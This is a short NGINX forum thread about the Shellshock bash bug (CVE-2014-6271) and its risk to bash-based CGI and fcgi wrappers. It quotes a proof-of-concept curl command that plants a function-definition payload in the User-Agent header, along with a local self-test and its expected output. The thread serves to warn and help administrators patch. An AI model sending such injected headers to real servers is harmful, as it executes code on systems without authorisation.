CVE-2014-6271 : Remote code execution through bash

Server NGINX
1

hi list,

the following bug (Remote code execution through bash)
http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

might affect you if you use a shell/bash - based fcgi-wrapper like
in
the following
receipt: FCGI Wrap | NGINX /
http://wiki.nginx.org/FcgiwrapDebianInitScript
(did not tested it); if someone runs a shell-based cgi-wrapper and would
like to test the POC from
reddit, i’d be interested in the result :smiley:

curl -v -k -H ‘User-Agent: () { :;}; echo aa>/tmp/aa’
http://example.com/path/to/file

at least i can confirm this affects bash-based CGIs.
ssh-based gitolite/gitlab et al are affected too.

local self-test:

Output, wenn vulnerable:

$ env x=‘() { :;}; echo vulnerable’ bash -c “echo this is a test”
vulnerable
this is a test

Output, wenn not vulnerable:

$ env x=‘() { :;}; echo vulnerable’ bash -c “echo this is a test”
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’
this is a test

additional references:

Advisory CVE-2014-6271: remote code execution through bash (oss-sec-ml)

Analysis 1 oss-sec ml

Analysis 2 / RedHat

Naxsi-WAF Signatures
http://blog.dorvakt.org/2014/09/ruleset-update-possible-remote-code.html

regards & happy patching
(and sorry for this slightly OT-post)

mex

Posted at Nginx Forum:

2

This could also be abused if you ever add any ENV variables that can
come from a user.

3

foo …

http://www.openwall.com/lists/oss-security/2014/09/24/17

"Note that on Linux systems where /bin/sh is symlinked to /bin/bash,
any popen() / system() calls from within languages such as PHP would
be of concern due to the ability to control HTTP_* in the env.

/mz"

$ ls -la /bin/sh
lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh → dash

phew ':slight_smile:

Posted at Nginx Forum: